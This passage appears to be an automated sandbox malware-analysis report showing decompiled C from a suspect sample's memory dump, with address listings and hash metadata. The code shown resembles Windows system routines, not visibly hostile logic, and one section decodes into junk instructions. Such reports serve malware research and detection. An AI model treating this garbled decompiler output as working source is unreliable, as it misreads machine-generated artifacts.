										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E010AB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E010AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E010AA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                            0x0106b171
                                                                                                            0x0106b171
                                                                                                            0x0106b171
                                                                                                            0x0106b171
                                                                                                            0x0106b171
                                                                                                            0x0106b176
                                                                                                            0x0106b17b
                                                                                                            0x0106b180
                                                                                                            0x0106b186
                                                                                                            0x0106b18f
                                                                                                            0x0106b198
                                                                                                            0x0106b1a4
                                                                                                            0x0106b1aa
                                                                                                            0x010c4802
                                                                                                            0x010c4802
                                                                                                            0x010c4805
                                                                                                            0x010c480c
                                                                                                            0x010c480e
                                                                                                            0x0106b1d1
                                                                                                            0x0106b1d3
                                                                                                            0x0106b1de
                                                                                                            0x0106b1de
                                                                                                            0x010c4817
                                                                                                            0x010c481e
                                                                                                            0x010c4820
                                                                                                            0x010c4822
                                                                                                            0x010c4822
                                                                                                            0x010c4824
                                                                                                            0x010c4824
                                                                                                            0x010c482a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4835
                                                                                                            0x010c483a
                                                                                                            0x010c483d
                                                                                                            0x010c483f
                                                                                                            0x010c4842
                                                                                                            0x010c4842
                                                                                                            0x010c4842
                                                                                                            0x010c4846
                                                                                                            0x010c484c
                                                                                                            0x010c484e
                                                                                                            0x010c4851
                                                                                                            0x010c4851
                                                                                                            0x010c4853
                                                                                                            0x010c4854
                                                                                                            0x010c4854
                                                                                                            0x010c4858
                                                                                                            0x010c485a
                                                                                                            0x010c485a
                                                                                                            0x010c485d
                                                                                                            0x010c485f
                                                                                                            0x010c4861
                                                                                                            0x010c4861
                                                                                                            0x010c4866
                                                                                                            0x010c486b
                                                                                                            0x010c486e
                                                                                                            0x010c4871
                                                                                                            0x010c4876
                                                                                                            0x010c4876
                                                                                                            0x010c4878
                                                                                                            0x010c487b
                                                                                                            0x010c4884
                                                                                                            0x010c4884
                                                                                                            0x00000000
                                                                                                            0x010c487d
                                                                                                            0x010c487d
                                                                                                            0x010c4882
                                                                                                            0x010c4889
                                                                                                            0x010c4889
                                                                                                            0x010c488f
                                                                                                            0x010c4891
                                                                                                            0x010c48e0
                                                                                                            0x010c48e2
                                                                                                            0x010c48e4
                                                                                                            0x010c48e4
                                                                                                            0x010c48e7
                                                                                                            0x010c48e7
                                                                                                            0x010c48ed
                                                                                                            0x010c48f4
                                                                                                            0x010c48f6
                                                                                                            0x010c4951
                                                                                                            0x010c4951
                                                                                                            0x010c4953
                                                                                                            0x010c4953
                                                                                                            0x010c4956
                                                                                                            0x010c4956
                                                                                                            0x010c4958
                                                                                                            0x010c4959
                                                                                                            0x010c4959
                                                                                                            0x010c495d
                                                                                                            0x010c495d
                                                                                                            0x010c495f
                                                                                                            0x010c495f
                                                                                                            0x010c4965
                                                                                                            0x010c4969
                                                                                                            0x010c49ba
                                                                                                            0x010c49ba
                                                                                                            0x010c49c1
                                                                                                            0x010c49c5
                                                                                                            0x010c49cc
                                                                                                            0x010c49d4
                                                                                                            0x010c49d7
                                                                                                            0x010c49da
                                                                                                            0x010c49e4
                                                                                                            0x010c49e5
                                                                                                            0x010c49f3
                                                                                                            0x010c4a02
                                                                                                            0x00000000
                                                                                                            0x010c4a02
                                                                                                            0x010c4972
                                                                                                            0x010c4974
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4976
                                                                                                            0x010c4979
                                                                                                            0x010c4982
                                                                                                            0x010c4983
                                                                                                            0x010c4984
                                                                                                            0x010c498b
                                                                                                            0x010c498d
                                                                                                            0x010c4991
                                                                                                            0x010c4993
                                                                                                            0x010c4999
                                                                                                            0x010c499d
                                                                                                            0x010c49a2
                                                                                                            0x010c49a2
                                                                                                            0x010c49a2
                                                                                                            0x010c4999
                                                                                                            0x010c49ac
                                                                                                            0x00000000
                                                                                                            0x010c49b3
                                                                                                            0x010c48f8
                                                                                                            0x010c48fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c48fe
                                                                                                            0x010c4895
                                                                                                            0x010c489c
                                                                                                            0x010c48ad
                                                                                                            0x010c48b2
                                                                                                            0x010c48b5
                                                                                                            0x010c48b7
                                                                                                            0x010c48ba
                                                                                                            0x010c48bc
                                                                                                            0x010c48c6
                                                                                                            0x010c48c6
                                                                                                            0x010c48cb
                                                                                                            0x010c48d1
                                                                                                            0x010c48d4
                                                                                                            0x010c48d8
                                                                                                            0x010c48d8
                                                                                                            0x00000000
                                                                                                            0x010c48d8
                                                                                                            0x010c48be
                                                                                                            0x010c48c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c48c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c48c4
                                                                                                            0x00000000
                                                                                                            0x010c4882
                                                                                                            0x010c487b
                                                                                                            0x010c4904
                                                                                                            0x010c4906
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4908
                                                                                                            0x010c490e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4910
                                                                                                            0x010c4917
                                                                                                            0x010c4917
                                                                                                            0x00000000
                                                                                                            0x010c4917
                                                                                                            0x0106b1ba
                                                                                                            0x010c47f9
                                                                                                            0x010c47fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c47fc
                                                                                                            0x0106b1c0
                                                                                                            0x0106b1c0
                                                                                                            0x0106b1c3
                                                                                                            0x0106b1cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _vswprintf_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 677850445-0
                                                                                                            • Opcode ID: 0f9ec09227dfedc9db09af164006598f9a996980a0bfd053566b6547ee7c9455
                                                                                                            • Instruction ID: 05fefaf1b9d41d31976d64d63c5e3876eafe40d7bfea409b52bec051be933c16
                                                                                                            • Opcode Fuzzy Hash: 0f9ec09227dfedc9db09af164006598f9a996980a0bfd053566b6547ee7c9455
                                                                                                            • Instruction Fuzzy Hash: F751A175D002698AEB758FA88854BEEBBF0FF04B10F1041ADD899DB282D7714945CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01092581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E01092581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912005) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				intOrPtr _t274;
				signed int _t276;
				signed int _t278;
				void* _t279;
				signed int _t280;
				unsigned int _t283;
				signed int _t287;
				signed int* _t288;
				signed int _t289;
				signed int _t293;
				intOrPtr _t305;
				signed int _t314;
				signed int _t316;
				signed int _t317;
				signed int _t321;
				signed int _t322;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t330;
				void* _t331;
				void* _t333;

				_t327 = _t330;
				_t331 = _t330 - 0x4c;
				_v8 =  *0x115d360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t321 = 0x115b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t283 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t274 = 0x48;
				_t303 = 0 | _t333 == 0x00000000;
				_t314 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t322 = 0xc0000106;
						goto L32;
					} else {
						_t321 = L01084620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t321;
						__eflags = _t321;
						if(_t321 == 0) {
							_t322 = 0xc0000017;
							goto L32;
						} else {
							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
							_t50 = _t321 + 0x48; // 0x48
							_t316 = _t50;
							_t303 = _v32;
							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
							_t276 = 0;
							 *((short*)(_t321 + 0x30)) = _v48;
							__eflags = _t303;
							if(_t303 != 0) {
								 *(_t321 + 0x18) = _t316;
								__eflags = _t303 - 0x1158478;
								 *_t321 = ((0 | _t303 == 0x01158478) - 0x00000001 & 0xfffffffb) + 7;
								E010AF3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
								_t303 = _v32;
								_t331 = _t331 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E010F39F2(_t316);
									_t303 = _v32;
									_t316 = _t268;
								}
							}
							_t287 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t322 = _v68;
								__eflags = 0;
								 *((short*)(_t316 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t321 + _t276 * 4;
								_v56 = _t278;
								do {
									__eflags = _t303;
									if(_t303 != 0) {
										_t233 =  *(_v60 + _t287 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t287 * 4);
										 *(_t278 + 0x18) = _t316;
										_t237 =  *(_v60 + _t287 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M01092959))) {
												case 0:
													__ax =  *0x1158488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E010AF3E0(__edi,  *0x115848c, __ax & 0x0000ffff);
														__eax =  *0x1158488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E010AF3E0(_t316, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x1158480 & 0x0000ffff = E010AF3E0(__edi,  *0x1158484,  *0x1158480 & 0x0000ffff);
													__eax =  *0x1158480 & 0x0000ffff;
													__eax = ( *0x1158480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E010AF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E010AF3E0(_t316, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t331 = _t331 + 0xc;
													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
													__eflags = _t316;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t316 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx = "\\WIw\\WIw";
													__eflags = __ebx - "\\WIw\\WIw";
													if(__ebx != "\\WIw\\WIw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E010AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WIw\\WIw";
														} while (__ebx != "\\WIw\\WIw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1158478 & 0x0000ffff = E010AF3E0(__edi,  *0x115847c,  *0x1158478 & 0x0000ffff);
													__eax =  *0x1158478 & 0x0000ffff;
													__eax = ( *0x1158478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E010F39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1156e58 & 0x0000ffff = E010AF3E0(__edi,  *0x1156e5c,  *0x1156e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1156e58 & 0x0000ffff;
													__eax = ( *0x1156e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t287 = _v16;
													_t303 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t287 = _t287 + 1;
									_v16 = _t287;
									__eflags = _t287 - _v48;
								} while (_t287 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t314 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M01092935))) {
							case 0:
								__ax =  *0x1158488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t303 =  &_v64;
								_v80 = E01092E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1158480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1158480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0107EEF0(0x11579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0107EB70(__ecx, 0x11579a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t322;
												if(_t322 < 0) {
													L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t283 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1157b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0107EB70(__ecx, 0x11579a0);
										__eax = _v52;
										L36:
										_pop(_t315);
										_pop(_t323);
										__eflags = _v8 ^ _t327;
										_pop(_t275);
										return E010AB640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t303 =  &_v36;
									_t272 = E01092E3E(_t270,  &_v36);
									_t283 = _v36;
									_v76 = _t272;
								}
								if(_t283 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t283;
								}
								goto L14;
							case 6:
								__eax =  *0x1155764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1158478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1158478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1156e58 & 0x0000ffff;
								__eax = ( *0x1156e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t314 = _t314 + 1;
								if(_t314 >= _v48) {
									goto L16;
								} else {
									_t303 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t288 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t288 =  *_t288 | _t237;
					asm("o16 sub [ecx], cl");
					_t238 = _t237 + _t331;
					asm("daa");
					 *_t288 =  *_t288 | _t238;
					 *[es:ecx] =  *[es:ecx] | _t238;
					_t324 = _t321 + 1;
					 *_t288 =  *_t288 - _t288;
					 *0x1f010926 =  *0x1f010926 + _t238;
					_pop(_t279);
					_t239 = _t238 | 0x09289401;
					 *0x2010d5b =  *0x2010d5b + _t324;
					 *_t288 =  *_t288 - _t288;
					 *((intOrPtr*)(_t239 - 0x9fef6d8)) =  *((intOrPtr*)(_t239 - 0x9fef6d8)) + _t239;
					asm("daa");
					 *_t288 =  *_t288 | _t239;
					_push(ds);
					 *_t288 =  *_t288 - _t288;
					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
					 *_t288 =  *_t288 | _t239;
					asm("daa");
					 *_t288 =  *_t288 | _t239;
					asm("fcomp dword [ebx+0xd]");
					 *((intOrPtr*)(_t239 +  &_a1546912005)) =  *((intOrPtr*)(_t239 +  &_a1546912005)) + _t324;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x113ff00);
					E010BD08C(_t279, _t316, _t324);
					_v44 =  *[fs:0x18];
					_t317 = 0;
					 *_a24 = 0;
					_t280 = _a12;
					__eflags = _t280;
					if(_t280 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t293 = _t245 * 0xc;
							_v48 = _t293;
							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x1041664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E010AE5C0(_a8,  *((intOrPtr*)(_t293 + 0x1041668)), _t280);
									_t331 = _t331 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t325 = E010E51BE(_t280,  *((intOrPtr*)(_v48 + 0x104166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t289 = _a4;
								__eflags = _t289;
								if(_t289 != 0) {
									_v36 = _t289;
									__eflags =  *_t289 - _t317;
									if( *_t289 == _t317) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t305 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t305 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
											__eflags =  *(_t305 + 0x1c);
											if( *(_t305 + 0x1c) == 0) {
												L106:
												_t325 = E01092AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t317 = 1;
													_t289 = _v36;
													goto L75;
												}
											} else {
												_t250 = E01076600( *(_t305 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t289 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E01092C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t257 = E01092AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E01092C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
									}
									_v8 = _t317;
									E01092ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t325;
					}
					L70:
					return E010BD0D1(_t243);
				}
				L108:
			}






















































                                                                                                            0x01092584
                                                                                                            0x01092586
                                                                                                            0x01092590
                                                                                                            0x01092596
                                                                                                            0x01092597
                                                                                                            0x01092598
                                                                                                            0x01092599
                                                                                                            0x0109259e
                                                                                                            0x010925a4
                                                                                                            0x010925a9
                                                                                                            0x010925ac
                                                                                                            0x010925ae
                                                                                                            0x010925b1
                                                                                                            0x010925b2
                                                                                                            0x010925b5
                                                                                                            0x010925b8
                                                                                                            0x010925bb
                                                                                                            0x010925bc
                                                                                                            0x010925bf
                                                                                                            0x010925c2
                                                                                                            0x010925c5
                                                                                                            0x010925c6
                                                                                                            0x010925cb
                                                                                                            0x010925ce
                                                                                                            0x010925d8
                                                                                                            0x010925db
                                                                                                            0x010925dd
                                                                                                            0x010925de
                                                                                                            0x010925e1
                                                                                                            0x010925e3
                                                                                                            0x010925e9
                                                                                                            0x010926da
                                                                                                            0x010926da
                                                                                                            0x010926dd
                                                                                                            0x010926e2
                                                                                                            0x010d5b56
                                                                                                            0x00000000
                                                                                                            0x010926e8
                                                                                                            0x010926f9
                                                                                                            0x010926fb
                                                                                                            0x010926fe
                                                                                                            0x01092700
                                                                                                            0x010d5b60
                                                                                                            0x00000000
                                                                                                            0x01092706
                                                                                                            0x01092706
                                                                                                            0x0109270a
                                                                                                            0x0109270a
                                                                                                            0x0109270d
                                                                                                            0x01092713
                                                                                                            0x01092716
                                                                                                            0x01092718
                                                                                                            0x0109271c
                                                                                                            0x0109271e
                                                                                                            0x010d5b6c
                                                                                                            0x010d5b6f
                                                                                                            0x010d5b7f
                                                                                                            0x010d5b89
                                                                                                            0x010d5b8e
                                                                                                            0x010d5b93
                                                                                                            0x010d5b96
                                                                                                            0x010d5b9c
                                                                                                            0x010d5ba0
                                                                                                            0x010d5ba3
                                                                                                            0x010d5bab
                                                                                                            0x010d5bb0
                                                                                                            0x010d5bb3
                                                                                                            0x010d5bb3
                                                                                                            0x010d5ba3
                                                                                                            0x01092724
                                                                                                            0x01092726
                                                                                                            0x01092729
                                                                                                            0x0109272c
                                                                                                            0x0109279d
                                                                                                            0x0109279d
                                                                                                            0x010927a0
                                                                                                            0x010927a2
                                                                                                            0x00000000
                                                                                                            0x0109272e
                                                                                                            0x0109272e
                                                                                                            0x01092731
                                                                                                            0x01092734
                                                                                                            0x01092734
                                                                                                            0x01092736
                                                                                                            0x010d5bc1
                                                                                                            0x010d5bc1
                                                                                                            0x010d5bc4
                                                                                                            0x00000000
                                                                                                            0x010d5bca
                                                                                                            0x010d5bca
                                                                                                            0x010d5bcd
                                                                                                            0x00000000
                                                                                                            0x010d5bd3
                                                                                                            0x00000000
                                                                                                            0x010d5bd3
                                                                                                            0x010d5bcd
                                                                                                            0x0109273c
                                                                                                            0x0109273c
                                                                                                            0x01092742
                                                                                                            0x01092747
                                                                                                            0x0109274a
                                                                                                            0x0109274d
                                                                                                            0x01092750
                                                                                                            0x00000000
                                                                                                            0x01092756
                                                                                                            0x01092756
                                                                                                            0x00000000
                                                                                                            0x01092902
                                                                                                            0x01092908
                                                                                                            0x0109290b
                                                                                                            0x00000000
                                                                                                            0x01092911
                                                                                                            0x0109291c
                                                                                                            0x01092921
                                                                                                            0x00000000
                                                                                                            0x01092921
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092880
                                                                                                            0x01092887
                                                                                                            0x0109288c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092805
                                                                                                            0x0109280a
                                                                                                            0x01092814
                                                                                                            0x01092816
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109281e
                                                                                                            0x01092821
                                                                                                            0x01092823
                                                                                                            0x00000000
                                                                                                            0x01092829
                                                                                                            0x01092829
                                                                                                            0x01092831
                                                                                                            0x0109283c
                                                                                                            0x0109283e
                                                                                                            0x00000000
                                                                                                            0x0109283e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109284e
                                                                                                            0x01092850
                                                                                                            0x01092851
                                                                                                            0x01092854
                                                                                                            0x01092857
                                                                                                            0x0109285a
                                                                                                            0x0109285c
                                                                                                            0x0109285d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109275d
                                                                                                            0x01092761
                                                                                                            0x00000000
                                                                                                            0x01092767
                                                                                                            0x0109276e
                                                                                                            0x01092773
                                                                                                            0x01092773
                                                                                                            0x01092776
                                                                                                            0x01092778
                                                                                                            0x0109277e
                                                                                                            0x0109277e
                                                                                                            0x01092781
                                                                                                            0x01092781
                                                                                                            0x01092783
                                                                                                            0x01092784
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5bd8
                                                                                                            0x010d5bde
                                                                                                            0x010d5be4
                                                                                                            0x010d5be6
                                                                                                            0x010d5be8
                                                                                                            0x010d5be9
                                                                                                            0x010d5bee
                                                                                                            0x010d5bf8
                                                                                                            0x010d5bff
                                                                                                            0x010d5c01
                                                                                                            0x010d5c04
                                                                                                            0x010d5c07
                                                                                                            0x010d5c0b
                                                                                                            0x010d5c0d
                                                                                                            0x010d5c0d
                                                                                                            0x010d5c15
                                                                                                            0x010d5c18
                                                                                                            0x010d5c1b
                                                                                                            0x010d5c1b
                                                                                                            0x010d5c1e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010928c3
